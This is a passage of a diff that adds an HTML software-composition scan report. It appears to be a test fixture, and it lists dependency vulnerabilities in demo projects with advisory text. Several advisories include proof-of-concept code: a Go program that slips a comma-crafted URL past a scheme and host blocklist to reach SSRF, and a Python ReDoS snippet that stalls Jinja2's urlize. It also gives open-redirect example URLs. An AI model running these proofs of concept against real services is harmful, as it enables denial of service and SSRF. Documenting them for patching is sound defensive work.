+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>mime</code> to version 1.4.1, 2.0.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/broofa/node-mime/commit/1df903fdeb9ae7eaa048795b8d580ce2c98f40b0" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/broofa/node-mime/commit/855d0c4b8b22e4a80b9401a81f2872058eae274d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/broofa/node-mime/issues/167" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li><li><a href="https://www.npmjs.com/advisories/535" target="_blank" rel="noopener noreferrer">NPM Security Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:mime:20170907" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">24</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:serve-static:20150113</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> serve-static@1.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1</div>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p>When using serve-static middleware version &lt; 1.7.2 and it&#39;s configured to mount at the root, it creates an open redirect on the site.</p><p>_Source: <a href="https://nodesecurity.io/advisories/35" target="_blank" rel="noopener noreferrer">Node Security Project</a>_</p><h2>Details</h2><p>For example:</p><p>If a user visits <code>http://example.com//www.google.com/%2e%2e</code> they will be redirected to <code>//www.google.com/%2e%2e</code>, which some browsers interpret as <code>http://www.google.com/%2e%2e</code>.</p><h2>Remediation</h2><ul><li>Update to version 1.7.2 or greater (or 1.6.5 if sticking to the 1.6.x line).</li><li>Disable redirects if not using the feature with &#39;redirect: false&#39; option and cannot upgrade.</li></ul><h2>References</h2><ul><li>https://github.com/expressjs/serve-static/issues/26</li><li>https://www.owasp.org/index.php/Open_redirect</li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:serve-static:20150113" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">golangproject</span>
+    <span class="meta-label">Target file</span><span class="meta-value">golang/go.mod (29 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 1</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge severity-badge--zero">0 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">1 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (1)</h2></summary>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">84</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-GOLANG-GITHUBCOMVALYALAFASTHTTP-6815320</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> github.com/valyala/fasthttp@1.51.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">golangproject@0.0.0 &#x203A; github.com/gofiber/fiber/v2@2.52.9 &#x203A; github.com/valyala/fasthttp@1.51.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pkg.go.dev/github.com/valyala/fasthttp" target="_blank" rel="noopener noreferrer">github.com/valyala/fasthttp</a> is a fast HTTP server and client API.</p><p>Affected versions of this package are vulnerable to Open Redirect due to improper handling of malformed URLs, allowing attackers to bypass the protections that users have set up for schemes and hosts. An attacker can send a URL involving a <code>,</code> to the Validator (e.g., <code>http://vulndetector.com,/</code>), bypassing the URL blocklist validation, and keep sending requests to the domain with a blocklisted hostname, leading to SSRF and RCE attacks.</p><h2>PoC</h2><pre><code>package main
+
+import (
+	&#34;fmt&#34;
+	&#34;github.com/valyala/fasthttp&#34;
+	&#34;net/url&#34;
+	&#34;strings&#34;
+)
+
+func safeURLOpener(inputLink string) (*fasthttp.Response, error) {
+	blockSchemes := map[string]bool{
+		&#34;file&#34;: true, &#34;gopher&#34;: true, &#34;expect&#34;: true,
+		&#34;php&#34;: true, &#34;dict&#34;: true, &#34;ftp&#34;: true,
+		&#34;glob&#34;: true, &#34;data&#34;: true,
+	}
+	blockHost := map[string]bool{
+		&#34;vulndetector.com&#34;: true,
+	}
+
+	parsedUrl, err := url.Parse(inputLink)
+	if err != nil {
+		fmt.Println(&#34;Error parsing URL:&#34;, err)
+		return nil, err
+	}
+
+	inputScheme := parsedUrl.Scheme
+	inputHostname := parsedUrl.Hostname()
+
+	if blockSchemes[inputScheme] {
+		fmt.Println(&#34;input scheme is forbidden&#34;)
+		return nil, nil
+	}
+
+	if blockHost[inputHostname] {
+		fmt.Println(&#34;input hostname is forbidden&#34;)
+		return nil, nil
+	}
+
+	// Create request and response objects
+	req := fasthttp.AcquireRequest()
+	resp := fasthttp.AcquireResponse()
+	defer fasthttp.ReleaseRequest(req)   // to reuse requests
+	defer fasthttp.ReleaseResponse(resp) // to reuse responses
+
+	req.SetRequestURI(inputLink)
+	err = fasthttp.Do(req, resp)
+	if err != nil {
+		fmt.Println(&#34;HTTP request failed:&#34;, err)
+		return nil, err
+	}
+
+	// Since we need the body outside this function, we create a copy of the response
+	newResp := &amp;fasthttp.Response{}
+	resp.CopyTo(newResp)
+	return newResp, nil
+}
+
+func verify() {
+	payload := &#34;http://vulndetector.com,/&#34;
+	result, err := safeURLOpener(payload)
+	if err != nil {
+		fmt.Println(&#34;Failed to open URL:&#34;, err)
+		return
+	}
+	if result != nil {
+		bodyBytes := result.Body()
+		bodyString := string(bodyBytes)
+		if result.StatusCode() == 200 &amp;&amp; strings.Contains(bodyString, &#34;FindVuln&#34;) {
+			fmt.Println(&#34;payload find! ==&gt;&#34;, payload)
+		}
+	}
+}
+
+func main() {
+	verify()
+}
+</code></pre><h2>Remediation</h2><p>Upgrade <code>github.com/valyala/fasthttp</code> to version 1.53.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/valyala/fasthttp/commit/a8fa9c04b493324b7805dd5c6f8439b1b15a9f92" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/valyala/fasthttp/pull/1761#issuecomment-2100784469" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVALYALAFASTHTTP-6815320" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Other</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">demo:maven-demo</span>
+    <span class="meta-label">Target file</span><span class="meta-value">maven/pom.xml (4 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 0</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge severity-badge--zero">0 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">not-python</span>
+    <span class="meta-label">Target file</span><span class="meta-value">not-python/requirements.txt (7 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 11</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">2 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">9 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (11)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">171</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Sandbox Bypass</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-455616</li>
+      <li class="card-meta-item">CWE-234</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Sandbox Bypass. Users were allowed to insert <code>str.format</code> through web templates, leading to an escape from sandbox.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.8.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/9b53045c34e61013dc8f09b7e52a555fa16bed16" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-455616" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">292</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Remote Code Execution (RCE)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-6808933</li>
+      <li class="card-meta-item">CWE-94</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient hostname checks and the use of relative paths to resolve requests. When the debugger is enabled, an attacker can convince a user to enter their own PIN to interact with a domain and subdomain they control, and thereby cause malicious code to be executed.</p><p>The demonstrated attack vector requires a number of conditions that render this attack very difficult to achieve, especially if the victim application is running in the recommended configuration of not having the debugger enabled in production.</p><h2>Remediation</h2><p>Upgrade <code>werkzeug</code> to version 3.0.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/werkzeug/commit/71b69dfb7df3d912e66bab87fbb1f21f83504967" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/releases/tag/3.0.3" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-6808933" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">84</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-1012994</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The ReDoS vulnerability is mainly due to the <code>_punctuation_re regex</code> operator and its use of multiple wildcards. The last wildcard is the most exploitable as it searches for trailing punctuation.</p><p>This issue can be mitigated by using Markdown to format user content instead of the urlize filter, or by implementing request timeouts or limiting process memory.</p><h3>PoC by Yeting Li</h3><pre><code>from jinja2.utils import urlize
+from time import perf_counter
+
+for i in range(3):
+    text = &#34;abc@&#34; + &#34;.&#34; * (i+1)*5000 + &#34;!&#34;
+    LEN = len(text)
+    BEGIN = perf_counter()
+    urlize(text)
+    DURATION = perf_counter() - BEGIN
+    print(f&#34;{LEN}: took {DURATION} seconds!&#34;)
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.11.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/blob/ab81fd9c277900c85da0c322a2ff9d68a235b2e6/src/jinja2/utils.py#L20" target="_blank" rel="noopener noreferrer">GitHub Additional Information</a></li><li><a href="https://github.com/pallets/jinja/pull/1343" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-1012994" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">154</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Sandbox Escape</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-174126</li>
+      <li class="card-meta-item">CWE-265</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Sandbox Escape via the <code>str.format_map</code>. This vulnerability requires the attacker to have information about sensitive attributes, and exploiting it could allow the attacker to access sensitive content.</p><h2>Workaround</h2><p>Override the <code>is_safe_attribute</code> method on the sandbox and explicitly disallow the <code>format_map</code> method on string objects.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.10.1 or higher.</p><h2>References</h2><ul><li><a href="https://palletsprojects.com/blog/jinja-2-10-1-released" target="_blank" rel="noopener noreferrer">Release Notes</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-174126" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">81</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-6150717</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the <code>xmlattr</code> filter, when using keys containing spaces in an application accepts keys as user input. An attacker can inject arbitrary HTML attributes into the rendered HTML template, bypassing the auto-escaping mechanism, which may lead to the execution of untrusted scripts in the context of the user&#39;s browser session.</p><p><strong>Note</strong></p><p>Accepting keys as user input is not common or a particularly intended use case of the <code>xmlattr</code> filter, and an application doing so should already be verifying what keys are provided regardless of this fix.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/7dd3680e6eea0d77fde024763657aa4d884ddb23" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.3" target="_blank" rel="noopener noreferrer">GitHub Release</a></li><li><a href="https://snyk.io/blog/jinja2-xss-vulnerability/" target="_blank" rel="noopener noreferrer">Snyk Blog</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-6150717" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">82</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
